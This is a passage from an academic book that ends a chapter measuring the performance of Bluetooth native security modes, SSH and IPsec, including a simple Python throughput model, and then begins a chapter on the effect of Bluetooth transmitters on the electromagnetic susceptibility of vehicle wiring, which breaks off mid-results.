In the following, we present comparative graphs only for two of the three network parameters, transfer times and throughput, for the PDA client. As already noted in "Comparison between PDA and Laptop Clients," the laptop client scenario results are directly comparable with those of the PDA client and thus do not contribute further to this discussion. Consequently, Figure 4 illustrates a comparison of the transfer times for six selected scenarios in total. We easily spot that all times, especially for file sizes smaller than 10.5 MB, seem to be highly concentrated. This means that (excluding the SSH ones) we have marginal differences between the performances of the conducted scenarios. But, the bigger the size gets, the difference tends to slightly decrease. Apart from the fact that all tests have the Bluetooth link parameter in common, this can be explained by the fact that Bluetooth modes and IPsec utilize the network better.

On the downside, SSH does not always provide peak network performance because it traditionally has been more focused on providing security. In a nutshell, SSHv2 introduced an additional form of flow control that requires the receiver to ACK each packet before more packets can be sent. Most implementations seem to use packet sizes of 16K or occasionally 32K, with some going as low as 4K. This means that no matter how fast the link, the transmission stops every 16K, for example, for one round trip time awaiting the other side to send its ACK (referred to as a window adjust in SSHv2 terminology). In addition to the protocol-level handbrake, the SSH file transfer protocol (SFTP) that runs on top of SSH contains its own handbrake. This protocol recommends that reading and writing is limited to less than 32K of data, even though it is running over the reliable SSH transport which in turn runs over the reliable TCP/IP transport. One common implementation limits SFTP packets to 4K bytes, resulting in a mere 4% link utilization in the previously-presented scenario.

Finally, Figure 5 depicts a comparison of the achieved throughput for the specific six scenarios. This plot gives a clearer idea about the achieved network performance. In short, IPsec scenarios visibly have the best performance by far, followed closely by the two Bluetooth security modes. Moreover, we can make a very important observation about SSH's performance. It is obvious that SSH's throughput increases as the file's size increases. This happens because of the handshaking phase which takes place during the initialization of each transaction. So, as the size of the transferred file increases, the impact of handshaking decreases and thus we notice an increase in the throughput. We should also report that the throughput of the other two scenarios remains more or less stable for all the file sizes we utilized. Another important issue is that during the experiments we observed a significant rate of packet loss for both Bluetooth security modes and SSH scenarios, affecting their overall performance. Certainly, the main reason for this is the volatile nature of the wireless connection itself.
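The two SSH effects described above, the window-adjust handbrake and the per-transaction handshake, can both be put into a small stop-and-go model: the sender pushes one window at link speed, then idles for one round trip until the receiver's window adjust arrives, and every transfer additionally pays a fixed handshake. The Python below is an added editor's example, not the chapter's code; the link rate is the 723.2 kbps DH5 forward limit of Table 9, while the round-trip times, window sizes and handshake duration are constructed values, since the chapter does not report the RTT behind its 4% figure.

```python
"""Stop-and-go model of the SSHv2 channel window ("window adjust") handbrake.

Editor's example, not the chapter's code. Link rate, RTTs, windows and handshake are constructed.
"""
import math


def window_limited_rate_kbps(link_kbps, rtt_ms, window_bytes):
    """Average rate when the sender pushes one window at link speed, then idles one RTT
    until the receiver's window adjust arrives (kbps is the same as bits per millisecond)."""
    send_ms = window_bytes * 8 / link_kbps
    return window_bytes * 8 / (send_ms + rtt_ms)


def utilisation_pct(link_kbps, rtt_ms, window_bytes):
    """Share of the link a window-limited sender can keep busy."""
    return round(window_limited_rate_kbps(link_kbps, rtt_ms, window_bytes) / link_kbps * 100, 1)


def transfer_time_s(file_bytes, link_kbps, rtt_ms, window_bytes, handshake_s=0.0):
    """Transfer time: a fixed per-transaction handshake plus one send-and-wait cycle per window."""
    cycles = math.ceil(file_bytes / window_bytes)
    cycle_ms = window_bytes * 8 / link_kbps + rtt_ms
    return handshake_s + cycles * cycle_ms / 1000


def effective_rate_kbps(file_bytes, link_kbps, rtt_ms, window_bytes, handshake_s):
    """File size over total time: grows with file size because the handshake is amortised,
    which is the behaviour the chapter observes in SSH's throughput column."""
    return file_bytes * 8 / 1000 / transfer_time_s(file_bytes, link_kbps, rtt_ms,
                                                    window_bytes, handshake_s)


if __name__ == "__main__":
    link = 723.2  # kbps, the DH5 forward limit of Table 9
    for rtt in (20, 100):  # constructed round-trip times in ms
        for window in (4 * 1024, 16 * 1024, 32 * 1024):
            print(f"rtt={rtt:3d} ms window={window:6d} B utilisation={utilisation_pct(link, rtt, window):5.1f} %")
    for size in (5_260_000, 15_000_000):  # the smallest and largest test files, in bytes
        print(size, "bytes ->", round(effective_rate_kbps(size, link, 50, 16 * 1024, 10.0), 1), "kbps")
```

With these constructed parameters the 4K window loses most of the link at a 100 ms round trip while 32K recovers much of it, which is the point the chapter makes about SFTP implementations; the effective-rate figures rise with file size for the reason the chapter gives, a fixed handshake spread over more data.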
Figure 4. Comparison of network transfer times for six different scenarios (PDA client). Bar chart "Comparison of Transfer Times for different scenarios": y-axis Seconds; x-axis file sizes (the four test files); series MODE I, MODE III, DES, Blowfish, AH_SHA, ESP_DES_SHA.

Additionally, it is well known that the addition of an IPsec header may cause IP fragmentation. However, the main concern in IPsec overhead is in the encryption, decryption, and authentication of the actual IPsec (ESP and/or AH) packets. Tunnel setup and rekeying occur much less frequently than packet processing and, except in highly unusual circumstances, their overheads are not worth worrying about. According to some other works (e.g., FreeSwan, 2002) utilizing low-end machines, a 60 MHz Pentium running a host-to-host tunnel to another machine shows an FTP throughput of slightly over 5 Mbit/s either way. Thereafter, we can conclude that in our case the IPsec mechanisms running on "relatively" low-end processors are not

really a bottleneck. The overall performance is rather affected most by the quality of the Bluetooth link itself, meaning that due to better utilization of the link and possibly due to the optimal ACL scheme and lower packet drop rate, IPsec performs slightly better than native Bluetooth modes do.

In Figure 6, we present some indicative Ethereal screens that attest why in practice IPsec performs better than the other two in terms of the additional protocol overhead induced. These screens illustrate the overall network statistics for Bluetooth mode III and IPsec AH_MD5, respectively. The "Data" section corresponds to the overall percent of data that were sent from the server towards the PDA client for the 5.26 MB file. We observe that IPsec needs a considerably lower percent of TCP data packets to complete the transaction (49.63%) than Bluetooth mode III, which requires 66.24%. Note that, excluding ARP messages, the remaining percent corresponds to control information sent from the client to the server including ACKs, retransmissions, and so forth. Therefore, IPsec utilizes the link better, achieving higher performance.

Another important factor that may affect the conducted results is the operating system itself. For that we performed partial measurements using the Windows XP operating system in the laptop client, while keeping all the other test-bed parameters unchanged. Under this setting, we observed significantly fewer packet retransmissions and logged fairly better times. For example, for Bluetooth mode III and file size 10.5 MB we got an average transfer time of 150 seconds, namely 5 seconds better than Linux. One can presume that the Bluetooth stack is better implemented in Windows than in Linux, or that the Bluetooth adapters that we used perform better under Windows, perhaps due to their drivers' implementation. Nevertheless, a detailed analysis of this

Figure 5. Comparison of network throughput for six different scenarios (PDA client). Bar chart "Comparison of Throughput for different scenarios": y-axis Percentage (%); x-axis file sizes (the four test files); series MODE I, MODE III, DES, Blowfish, AH_SHA, ESP_DES_SHA.

Figure 6. Ethereal screens with protocol hierarchy statistics (PDA client)

behavior between the two major operating systems is necessary but left for future work. An additional interesting research question is whether the recent updates of the Bluetooth specification to version 1.2, which have introduced significant changes in the Bluetooth protocol stack, including optional flow control, can affect the performance of the security mechanisms under investigation (Misic, Chan, & Misic, 2005). However, this is out of the scope of the current chapter.

For the laptop client we also provide some indicative metrics concerning the physical memory consumption for the three categories of scenarios. More specifically, memory consumption for Bluetooth modes I and III was 552 KB, which is the "pand" daemon. For SSH we have an additional 1920 KB, thus in total 2472 KB ("sshd" and "pand" daemons), and finally for the IPsec case we have 4027 KB ("pluto" and "pand" daemons).

Conclusion and Future Work

This chapter addresses performance issues for Bluetooth host-to-host connections. Three distinct categories of scenarios were used to test whether well respected security mechanisms of the Internet and application layers of the TCP/IP suite are advantageous when deployed over Bluetooth PANs compared to Bluetooth native security modes. The results disclose that IPsec better utilizes the wireless link and thus provides radically improved transfer times when compared with SSH. Native Bluetooth modes' service times are close to those of IPsec and thus significantly better than the SSH ones. On the other hand, there is an important disadvantage, which is the high amount of memory resources IPsec consumes.

As future work we would like to expand this study, investigating the performance of asymmetric cryptography mechanisms, for example, public key certificates, and to support authentication services in the context of such protocols that promote automatic keying. Another direction is to detect how much energy is required for this sort of secure connections, as mobile devices cannot afford batteries with unlimited capacity.

Acknowledgment

We would like to thank Mr. Alexis Andreadis and Mr. Paganos Charalampos for helping us with the network measurements.

References

Adam, L. (2003). Serious flaws in Bluetooth security lead to disclosure of personal data. Retrieved October 14, 2007, from http://www.bluestumbler.org

Bluetooth SIG. (2003, November 1). Specification of the Bluetooth system: Architecture & technology overview (Version 1.2). Retrieved October 14, 2007, from http://www.bluetooth.com

Chen, L., Kapoor, R., Sanadidi, M. Y., & Gerla, M. (2004). Enhancing Bluetooth TCP throughput via link layer packet adaptation. In Proceedings of the IEEE ICC '04 (Vol. 7, pp. 4012-4016).

De Morais Cordeiro, C., Sadok, D., & Agrawal, D. P. (2001). Modeling and evaluation of Bluetooth MAC protocol. In Proceedings of Tenth International Conference on Computer Communications and Networks (pp. 518-522).

Francia, G., Kilaru, A., Le Phuong, & Vashi, M. (2004). An empirical study of Bluetooth performance. In Proceedings of the 2nd Annual Conference on Mid-South College Computing, ACM International Conference Proceeding Series (Vol. 61, pp. 81-93).

FreeSwan. (2002). Performance of FreeSwan. Retrieved October 14, 2007, from http://www.freeswan.org/freeswan_trees/freeswan-1.95/doc/performance.html

Gehrmann, C., & Nyberg, K. (2002). Enhancements to Bluetooth baseband security. Ericsson Mobile Communications AB, Ericsson Research.

Gehrmann, C., Persson, J., & Smeets, B. (2004). Bluetooth security. Artech House Publishers.

Golmie, N., & Rebala, O. (2003). Techniques to improve the performance of TCP in a mixed Bluetooth and WLAN environment. In Proceedings of IEEE International Conference on Communications, ICC, Anchorage, AK (pp. 1181-1185).

Howitt, I. (2002). Bluetooth performance in the presence of 802.11b WLAN. IEEE Transactions on Vehicular Technology, 51(6), 1640-1651.

IEEE. (2002). Wireless PAN medium access control (MAC) and physical layer (PHY) specification. IEEE standard 802.15.1. New York: IEEE. Retrieved October 14, 2007, from http://www.ieee802.org/15/

IETF. (2006). IETF secure shell (secsh) working group. Retrieved October 14, 2007, from http://tools.ietf.org/wg/secsh/

Jacobson, M., & Wetzel, S. (2001). Security weaknesses in Bluetooth. In Proceedings of the Conference on Topics in Cryptology: The Cryptographer's Track at RSA (LNCS 2020, pp. 176-191).

Karnik, A., & Kumar, A. (2000). Performance analysis of the Bluetooth physical layer. In Proceedings of IEEE International Conference on Personal Wireless Communications (pp. 70-74).

Kent, S., & Atkinson, R. (1998a). IP authentication header (AH) (IETF RFC 2402).

Kent, S., & Atkinson, R. (1998b). IP encapsulating security payload (ESP) (IETF RFC 2406).

Massey, J., Khachatrian, G., & Kuregian, M. (1998). Nomination of SAFER+ as candidate algorithm for the advanced encryption standard (AES). In Proceedings of the 1st Advanced Encryption Standard Candidate Conference. Retrieved October 14, 2007, from www.ee.princeton.edu/~rblee/safer+

Miorandi, D., Caimi, C., & Zanella, A. (2003). Performance characterization of a Bluetooth piconet with multi-slot packets. In Proceedings of the WiOpt'03.

Misic, J., Chan, K. L., & Misic, V. B. (2005). TCP traffic in Bluetooth 1.2: Performance and dimensioning of flow control. In Proceedings of WCNC '05 (pp. 1798-1804).

OpenSSH. (2006). OpenSSH project home page. Retrieved October 14, 2007, from http://www.openssh.org

Persson, K., & Manivannan, D. (2003). Secure connections in Bluetooth scatternets. In Proceedings of the 36th Annual Hawaii International Conference on System Sciences (HICSS '03) (p. 314b).

Shaked, Y., & Wool, A. (2005). Cracking the Bluetooth PIN. In Proceedings of the 3rd ACM International Conference on Mobile Systems, Applications, and Services (pp. 39-50). ACM Press.

Wang, F., Arumugam, N., & Krishna, G. H. (2002). Performance of a Bluetooth piconet in the presence of IEEE 802.11 WLANs. In Proceedings of the 13th IEEE International Symposium on Personal, Indoor and Mobile Radio Communications (Vol. 4, pp. 1742-1746).

Yip, H. K., & Kwok, Y-K. (2004). A performance study of packet scheduling algorithms for coordinating colocated Bluetooth and IEEE 802.11b in a Linux machine. In Proceedings of the 7th International Symposium on Parallel Architectures, Algorithms and Networks (ISPAN'04).

Yujin, L., Jesung, K., Sang, L. M., & Joong, S. M. (2001). Performance evaluation of the Bluetooth-based public Internet access point. In Proceedings of the 15th International Conference on Information Networking (pp. 643-648).

Key Terms

Bluetooth: An industrial specification for wireless personal area networks (PANs). Bluetooth provides a way to connect and exchange information between devices such as mobile phones, laptops, PCs, printers, digital cameras, and video game consoles via a secure, globally unlicensed short-range radio frequency.

Goodput: The application level throughput, that is, the number of useful bits per unit of time forwarded by the network from a certain source address to a certain destination, excluding protocol overhead, retransmissions, and so forth.

IEEE 802.15: The IEEE 802.15 WPAN working group focuses on the development of consensus standards for personal area networks or short distance wireless networks. These WPANs address wireless networking of portable and mobile computing devices such as PCs, PDAs, peripherals, cell phones, pagers, and consumer electronics, allowing these devices to communicate and interoperate with one another. The IEEE Project 802.15.1 has derived a wireless personal area network standard based on the Bluetooth v1.1 Foundation Specifications.

IPsec: IPsec (IP security) is a suite of protocols for securing Internet protocol communications by encrypting and/or authenticating each IP packet in a data stream. IPsec also includes protocols for cryptographic key establishment. There are two modes of IPsec operation: transport mode and tunnel mode. IPsec is implemented by a set of cryptographic protocols for securing packet flows. Specifically, the authentication header (AH) protocol provides authentication, payload (message) and IP header integrity (with some cryptography algorithms also nonrepudiation). On the other hand, the encapsulating security payload (ESP) protocol provides data confidentiality, payload (message) integrity, and with some cryptography algorithms also authentication.

Network Performance: The level of quality of service of a telecommunications resource, protocol, or product.

Secure Shell or SSH: A set of standards and an associated network protocol that allows establishing a secure channel between a local and a remote computer. It uses public-key cryptography to authenticate the remote computer and to optionally allow the remote computer to authenticate the user. SSH provides confidentiality and integrity of data exchanged between the two computers using encryption and MACs.

Throughput: The amount of digital data per time unit that are delivered to a certain terminal in a network, from a network node, or from one node to another, for example, via a communication link.


Chapter XLII
Bluetooth Devices Effect on
Radiated EMS of Vehicle Wiring
Miguel A. Ruiz
University of Alcala, Spain

Felipe Espinosa
University of Alcala, Spain

David Sanguino
University of Alcala, Spain

AbdelBaset M.H. Awawdeh


University of Alcala, Spain

Abstract

The electromagnetic energy source used by wireless communication devices in a vehicle can cause electromagnetic compatibility problems with the electrical and electronic equipment on board. This work is focused on the radiated susceptibility (electromagnetic susceptibility [EMS]) iss
method for quantifying the electromagnetic influence of wireless radio frequency (RF) tran
board vehicles. The key to the analysis is the evaluation of the relation between the el
by a typical Bluetooth device operating close to the automobile's electrical and electronic systems and the field level specified by the electromagnetic compatibility (EMC) directive 2004/104/EC for radia
susceptibility tests. The chapter includes the model of a closed circuit structure emulating an automobile electric wire system and the simulation of its behaviour under electromagnetic field
to this a physical structure is designed and implemented, which is used for laboratory tests. Finally, simulated and experimental results are compared and the conclusions obtained are discussed.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

Introduction and Background

In the current vehicle coexist electronic and communications systems whose advantages are clear for the user but whose possible problems are not contrasted. The increasing use of radio frequency transmitters by automobile users makes it necessary to evaluate the risk caused by the coexistence of information and communication technologies in the reduced space inside the vehicle. In this
context, the present work appears in order to bring up methods and results that contribute to establishing the possible risk limits of the use of wireless devices inside the automobile, and more precisely those based on Bluetooth technology.

To centre the problem, the tendencies in the automobile field that bet on the incorporation of new electrical and electronic systems (X-by-Wire technology) (Leen & Hefferman, 2002; Mazo, Espinosa, Awawdeh, & Gardel, 2005) in front of the current mechanical systems are mentioned, aspects of the automotive electromagnetic compatibility (EMC) standard 2004/104/EC (2004) for evaluation of susceptibility/immunity in vehicles are detailed, and the interest in focusing the study on the widespread Bluetooth wireless communication technology is justified. However, there are questions not regulated by the 2004/104/EC concerning the use of Bluetooth devices, which raise uncertainties around the risk derived from their use.

To get a better knowledge of this issue, we lay out a few questions regarding the increase of the electronic equipment role in the automobile, the characteristics of commercial Bluetooth devices, some notes about the EMC European Directive involved in vehicles, and last but not least, some of the directive gaps concerning Bluetooth wireless devices in this context.

The Increase in Electrical and Electronic Components in Automobiles

It is clear that nowadays on board electronic components play an important role in vehicles (Bannatyne, 2000; Leen & Hefferman, 2002; Mazo et al., 2005), as much for the increase in the number of electronically controlled units (ECUs) as for the complexity of the communication system (field buses) implemented.

Continuous development in the industrial automobile sector means that dynamic systems that have traditionally been of a mechanical and hydraulic nature, such as the steering, braking, and acceleration, are being replaced by electronic ones, which leads to the proposal of networks such as X-by-Wire with its own protocol (Mazo et al., 2005).

Taking advantage of the trend towards the use of DC voltage supplies of 36-42 volts instead of the 12-14 volts currently used, an increase in electronics is being adopted to control key elements of the automobile such as the steering, braking, and acceleration. For example, the car uses a range of electric actuators and also has an innovative driver interface. The driver has all the vehicle functionality in a special steering wheel, which is used for acceleration and braking as well as for steering and gear shifting. The vehicle uses a conventional engine for propulsion but electromechanical actuators for braking, clutching, and gear shifting (Larses, 2003).

With the progress of X-by-Wire technology, in-vehicle data traffic is always growing. Conventionally, individual wire harnesses were used for data transfers between control units and their associated sensors or display devices. As the number of control units and associated devices increases, the number of wire harnesses and interconnections required is swelling. The in-vehicle local-area network (controller area network [CAN], local interconnect network [LIN], and FlexRay) provides an answer to this problem: it minimises the use of individual wire harnesses for data exchanges and reduces both interconnections and vehicle weight, trying to improve consumption, power, security, and comfort.

However, associated with these electronic and communication innovations, new sources of potential equipment failure appear, leading to the necessity to continue working on both diagnosis and prognosis in the automotive sector.

Bluetooth Devices and Applications in Automobiles

The presence of radio frequency transmitters in automobiles as a way for multiple wireless communication appliances continues to grow. Apart from the well known uses for assistance and entertainment (GPS, laptops, PDAs, digital cameras, portable multimedia devices CD/DVD, etc.), others such as remote diagnosis, traffic control, accident assistance, and so forth are being promoted (Campos, Mills, & Graves, 2002; Mazo et al., 2005).


Bluetooth Devices Effect on Radiated EMS of Vehicle Wiring

There are several wireless technologies (WiFi, DSRC, Zigbee, etc.) available to automobile manufacturers and users, but at present the most widely used is Bluetooth. Although the functionality and operativity of each technology is different, they have in common the incorporation of a transmitter or an electromagnetic energy source in the environment in which they operate. This extra energy can cause failures of any kind in equipment situated close to the transmitter, as is the case of ECUs on board a vehicle where the driver introduces several wireless devices. At the same time, the metal cage of the vehicle can act as a concentrating reflector, amplifying the radio frequency (RF) density emitted by different radiation sources to higher and potentially more dangerous levels.

Bluetooth is an open technology that works with low power and is designed for short range (10 m-100 m), which has led to its wide use in transport applications in general and in automobiles in particular. The operating frequency range lies within the industrial, scientific, and medical (ISM) band of 2.4 GHz to 2.4835 GHz. The frequency range is divided into 79 individual RF channels, each one separated by 1 MHz. The output levels are divided into three classes (SIG, 2006): class I (100 mW, +20 dBm), class II (2.5 mW, +4 dBm) and class III (1 mW, 0 dBm).

The equation that determines the frequency for each one of the channels is as follows:

F(MHz) = 2402 + k, where k = 0…78.

In order to comply with out-of-band regulations in each country, a lower guard band of 2 MHz and an upper guard band of 3.5 MHz are used. The protocol uses spread spectrum; in other words, the transmission frequency changes randomly 1,600 times per second, reducing in this way the possible interference created by different transmitters working at the same time in the same frequency range.

Equipment transmits and receives using time division multiplexing (TDM). In addition, spread spectrum TDM provides a higher degree of security against eavesdropping and resilience to ambient noise. GFSK modulation is used in Bluetooth technology, where a logic 1 level is represented by a positive frequency shift and a logic 0 level is represented by a negative frequency shift. Keeping all this in mind, a Bluetooth transmitter, from an EMC viewpoint, can be considered as an interfering RF source in the 2.4 to 2.4835 GHz frequency band.

Two levels of Bluetooth technology application can be considered inside an automobile: Bluetooth integrated into the vehicle at a system level and Bluetooth at a user device level. From a user device level point of view, Bluetooth technology allows connecting inside the vehicle electronic mobile devices such as PDAs, laptops, GPSs, handsfree sets, or cell phones, as seen in Figure 1.

Figure 1. Typical applications of Bluetooth in vehicles

The concept of 'Bluetooth integrated into the vehicle at a system level' is used when a Bluetooth network can provide a functionality and versatility similar to a vehicle control cabled network (e.g., CAN bus), which is nowadays the most widely extended solution (network and protocol) in vehicles.

Directive 2004/104/EC for the Assessment of EMC in Vehicles

In Europe, EMC activity in automobiles is regulated by the recent directive on electromagnetic


compatibility (2004/104/EC EMC, 2004), which since July 1, 2006, substitutes the earlier directive (95/54/EC EMC, 1995). The new directive requires tests to be carried out both at component level and on the vehicle as a whole. The range of required tests includes broadband and narrowband radiated emissions (CISPR 12, 2001; CISPR 25, 2002; Kerry, 2003), radiated susceptibility (ISO 11452-2, 2004), as well as conducted susceptibility and emissions along the supply lines of electrical and electronic subcomponents (ISO 7637-2, 2004).

The present article focuses on the radiated susceptibility test in accordance with regulation ISO 11452-2, as this test allows determining the electromagnetic immunity of a device or electronic component on board the vehicle in proximity to RF transmitters.

Radiated Susceptibility Test According to ISO 11452-2

The before mentioned ISO 11452-2 describes a possible method for the radiated immunity test accepted by the EMC directive (2004/104/EC EMC, 2004) for the fulfilment of the electromagnetic immunity requirements of electric and electronic components on a vehicle.

Following the standard, the electromagnetic susceptibility (EMS) test must be done in a semi-anechoic chamber. The electromagnetic field is generated by an antenna connected to an RF amplifier. To monitor the electric field intensity level (V/m) inside the semianechoic chamber, an isotropic probe must be used.

Figure 2 shows the setup as explained in the standard for the radiated test on a vehicle device

Figure 2. Setup of the radiated susceptibility test

(equipment under test [EUT]). A metallic (copper or galvanised steel) ground plane of a minimum of 0.5 mm thickness and 1000 x 2000 mm (W x L) area has to be located 900 ± 10 mm above the floor. Each one of the power supply cables must be connected to the EUT through an artificial network (AN) [5] of 5 µH/50 Ω to get a reference impedance (usually 50 Ω). The ANs should be placed over the ground plane and connected to it.

The electric or electronic equipment under test has to be placed on a dielectric material [7] of low permeability (εr ≤ 1.4) and 50 ± 5 mm thickness. One of the EUT faces has to be placed 200 ± 10 mm from the edge of the ground plane. The cables connected to the EUT are exposed along 1500 ± 75 mm to the electromagnetic radiation generated by the antenna. They are placed on the same dielectric material as the EUT, 100 ± 10 mm away from the edge of the ground plane.

The antenna that generates the electric field has to be located at a 100 ± 10 mm height above the ground plane, that is 1000 mm above the floor, and also 1000 ± 10 mm away from the EUT cables.

The test procedure can be divided in two steps:

• A first one where the electric field level calibration is done (without EUT, cables nor ANs).
• A second in which the test takes place based on the levels obtained in the preceding step.

In the calibration stage, an isotropic probe 150 ± 10 mm above the ground plane and 100 ± 10 mm away from the edge is used. The calibration is done for both horizontal and vertical electric field.

Aspects of Bluetooth Devices that are not Considered in Directive 2004/104/EC

Having mentioned some of the properties of Bluetooth, as well as the EMC regulation applicable to the automobile context, and focusing the study on the assessment of the susceptibility of the electrical and electronic components on board to radiation from different wireless devices, the following observations remain to be made:

• The specifications of the radiated susceptibility test, mentioned in the directive using the semianechoic chamber method to carry it out, determine that the range of frequencies to be tested is from 20 MHz to 2000 MHz. Therefore, the directive does not make it compulsory to test electrical and electronic automobile equipment at frequencies higher than 2 GHz. Bluetooth works at frequencies between 2.400 and 2.4835 GHz, and hence an electronic subsystem or component that complies with the directive does not guarantee electromagnetic compatibility in the presence of a Bluetooth device.
• The electric field levels specified by the directive to be tested in the 20 to 2000 MHz range are 30 V/m for 90% of the frequency band and 25 V/m for the whole frequency band. It is foreseeable that in the near future the directive will be modified to increase the range of frequencies to at least include the operating frequencies used by the wireless devices available on the market to automobile users.
• The test method specified in the directive corresponds to a situation in which the transmitter is not situated close to the equipment being studied. This leads to the use of a plane wave in the test setup, which requires one or more transmitter antennas working in far field. However, in this particular case it is easy to find Bluetooth transmitters, either belonging to the automobile's own electrical and electronic system or other ones (introduced by users), operating a few centimetres away from the electronic systems and wires of the vehicle's electrical installation.

With this background, the present work is developed with the aim of determining whether a device that complies with the requirements of the EMC automobile directive presents any possible electromagnetic compatibility risk in the presence of Bluetooth transmitters located a short distance away. In addition, a measurement procedure is proposed for assessing the degree of interrelation between the electronics on board and the Bluetooth devices incorporated by vehicles' users.

Related Published Works

In the technical literature, negative examples of vehicle-communication system interaction can be found, as in the case of 'Project 54' (Kun, Lenharth, & Millar, 2004), in which the origin of and possible solutions to random signal reception by appliances normally used by traffic police officers are analysed. There are other more complex cases, such as the one stated by Tatoian (2005), in which the possibility of equipping the police with electromagnetic systems in order to block cars in conflictive traffic conditions is assessed. The impact of transient surrounding perturbations (especially due to electromagnetic interference) on the dependability of systems distributed on TDMA-based networks in the automotive domain is analysed by Campos et al. (2002).

All of this justifies the interest of automobile manufacturers in regulating the incorporation of new information and communication technologies. In Australia, for example, there is the FCAI (1997) initiative, in which the automobile industry and the nation's government are working together to establish the emission and susceptibility limits to which new vehicles must conform in order to guarantee the compatibility of the electronics on board the vehicle with the multimedia equipment for drivers available on the market. EMC centres work along the same lines in association with automobile manufacturers such as Audi or Renault (Renault, 2006).

On the other hand, there are several previous research works related to this subject. Stadtler, Schoof, and Haseborg (2002) calculate that a 100 mW Bluetooth transmitter in far field (1 m) generates an electric field level of 5.42 V/m, that is, a level quite lower than the one used in the EMC test according to the 2004/104/EC standard. Nevertheless, simulation results presented by Schoof, Stadtler, and Haseborg (2003) inside a vehicle cockpit with a 100 mW Bluetooth transmitter achieved electric field levels of 52 V/m, which is close to the limit level indicated by the EMC standard.

Proposed Method for Assessing the Possible Effects of Bluetooth Devices Used Inside Vehicles

Taking into account previously published studies (Schoof et al., 2003; Stadtler et al., 2002) and the EMC specifications in the automotive context, certain questions must be raised in relation to the incorporation of Bluetooth transmitters in automobiles by either the manufacturer or the users of the vehicle. As mentioned earlier, the EMC directive (2004/104/EC EMC, 2004) does not require radiated susceptibility tests above 2 GHz and restricts the field level of the equipment under test to 25 or 30 V/m. Moreover, in present day traffic conditions, it is easy to find several Bluetooth transmitters inside the cabin of the vehicle and within a few centimetres of the vehicle's cables and of automobile electronic systems.

Fundament of the Proposed Measure

The setup for the radiated susceptibility test for an automobile component in accordance with ISO regulation 11452-2 (ISO 11452-2, 2004) was represented previously in the chapter. This setup contains similarities to the actual layout of the components inside a vehicle. For example, the equipment under test [1], wiring [2], simulators [3], and power supply [4] are placed on a ground plane that emulates the chassis of the vehicle. The length of wire exposed to the radiation is 1.5 m, which is the usual length of cable on board a vehicle.

In this context, a study is made of the radio frequency current that is induced in the cable [2] when it is submitted to the action of a Bluetooth transmitter in near field, that is to say with a few centimetres between transmitter and cable.

Once the current induced in the EUT cable by the Bluetooth transmitter has been determined, the electric field level that must be applied during


the radiated susceptibility test in order to induce a current value identical to that induced by the Bluetooth transmitter a few centimetres away is analysed. If the electric field level required to induce the current value is under the 25 or 30 V/m specified by 2004/104/EC EMC, it will confirm that all equipment that fulfils the EMC directive should not present compatibility problems. However, if the electric field level is similar to or higher than the one specified by the EMC directive, there is no guarantee that the automotive component will not have electromagnetic compatibility problems in close proximity to a Bluetooth transmitter.

Practical Implementation and Results

Following the guidelines indicated by Stadtler et al. (2002), the setup shown in Figure 3 is used for the present research work. The impedance presented by the EUT [1] between the cable and the ground plane [6] is modelled as an ideal impedance of 50 Ω. At the other end of the cable an ideal impedance of 50 Ω represents the one corresponding to the artificial network [5] or to other auxiliary equipment.

In the first approach at validating the proposed thesis the electromagnetic simulation tool FEKO (2005) is used. In the laboratory experimental phase, an R&S ESIB 26 spectrum analyser tuned to the transmission frequency of the device is used to measure the induced current. The resistance of 50 Ω that corresponds to the EUT is provided by the spectrum analyser input; as an impedance of 50 Ω at the other end of the cable, a 50 Ω load with an N connector is used. The analyser registers the voltage value at its input terminals, and by direct relation the value of the current induced in the cable is determined.

Figure 3. Setup diagram of the test used to determine the current induced by a transmitter in near field

Design of the Interference Pattern

An electromagnetic radiation source in the 2.400 to 2.483 GHz range has been designed with adjustable power between 1 and 100 mW, emulating the behaviour of class I, II, and III Bluetooth transmitters. The radiation source consists of an antenna connected to an R&S SMR20 RF generator. The antenna design is based on a commercial radio frequency module (SparkFun, 2005), simulated using FEKO and implemented on a PCB.

Elements of the Setup

Figure 4 shows the setup used to measure the current induced in the cable when the Bluetooth transmitter is situated a short distance away. The right hand side of the cable is loaded with an impedance of 50 Ω, while the impedance of 50 Ω on the left hand side is provided by the spectrum analyser input (R&S ESIB 26), which is outside


the semianechoic chamber (Space Saver of ETS) during the test and is connected by means of an RG214 cable. The attenuation caused by the RG214 cable is corrected by the spectrum analyser.

To measure the induced current, the radiation source is placed in different positions with respect to the 1.5 m long cable. The measurements are made with the transmitter facing the cable and in various positions along its length. The transmitter is placed at distances of 2 cm, 5 cm, and 8 cm from the cable and at heights with respect to the ground plane of 0.6 cm and 3.7 cm.

To determine the value of the electric field intensity (V/m), the setup represented in Figure 4 is used, corresponding to the radiated susceptibility test for automobile components (2004/104/EC EMC, 2004). The electric field level is registered by means of an isotropic electric field probe (FP6001 AR) placed at a height of 10 cm above the ground plane and 10 cm from the edge facing the antenna. The value of the current induced by the radiation of the AT4000 AR antenna situated at a distance of 1 m is constantly measured on the spectrum analyser. The power transferred to the antenna is varied until the induced current values are identical to those obtained when the Bluetooth transmitter was situated a few centimetres from the same cable. This is the way to determine the electric field level that induces the same current as a Bluetooth transmitter in the conditions previously described.

Figure 4. Setup of the test used to measure the current induced by a transmitter in near field (top). Setup used to determine the electric field level (down). Labelled elements: connecting spectrum analyzer (EUT); load 50 Ω; antenna and RF generator (Bluetooth TX simulated); cable under test; electric-field probe; transmitter antenna.

Results

In the following section, some of the results obtained for the setups proposed in previous sections, by both simulations and practical measurements made in the laboratory, are given, with the principal aim of determining the electromagnetic compatibility risks caused by commercial Bluetooth transmitters in automobiles.

The FEKO tool is used to simulate a ground plane with a 150 cm cable above it at a height of 5 cm, with both ends loaded with a resistance of 50 Ω. A monopole antenna connected to a generator was used as a transmitter in the simulation. The simulations are made with the antenna transmitter situated in the centre of the 1.5 m cable structure, at distances of 2 cm, 5 cm, and 8 cm and at heights above the ground plane of 0.6 cm and 3.7 cm. In addition, the simulations are carried out taking into account the different power classes (I, II, and III) specified by the Bluetooth technology.

Tables 1 and 2 represent a comparison between the results obtained with the FEKO simulation tool and those obtained in laboratory tests. First of all, the results belonging to a transmitter working at 2.425 GHz and at a height above the ground plane of 0.6 cm are presented. The table shows the variation in the induced current as a function of the distance that separates the transmitter from the cable, and for three different transmission powers (+20, +4, and 0 dBm). For example, in case the class I transmitter is separated a distance of 2 cm from the cable, the simulated current value


